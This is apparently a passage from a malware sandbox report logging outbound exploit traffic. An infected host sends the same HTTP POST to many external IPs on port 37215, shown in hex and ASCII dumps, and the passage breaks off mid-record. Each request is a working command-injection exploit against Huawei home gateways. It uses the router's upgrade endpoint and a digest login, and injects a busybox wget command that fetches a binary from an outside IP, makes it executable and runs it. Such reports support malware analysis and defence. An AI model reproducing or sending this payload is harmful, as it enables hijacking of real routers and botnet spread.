                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2329192.168.2.155492694.107.173.16637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468652964 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2330192.168.2.1552360222.27.92.3437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468671083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2331192.168.2.153911840.98.100.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468689919 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2332192.168.2.155042875.31.149.15337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468698978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2333192.168.2.1549412197.1.143.937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468712091 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2334192.168.2.1543266189.58.245.15137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468732119 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2335192.168.2.1539302157.200.118.3837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468818903 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2336192.168.2.1548634138.102.109.14537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468856096 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2337192.168.2.1547844186.15.161.21037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468873978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2338192.168.2.1550858203.142.9.6137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468893051 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2339192.168.2.154894431.42.11.11137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468899965 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
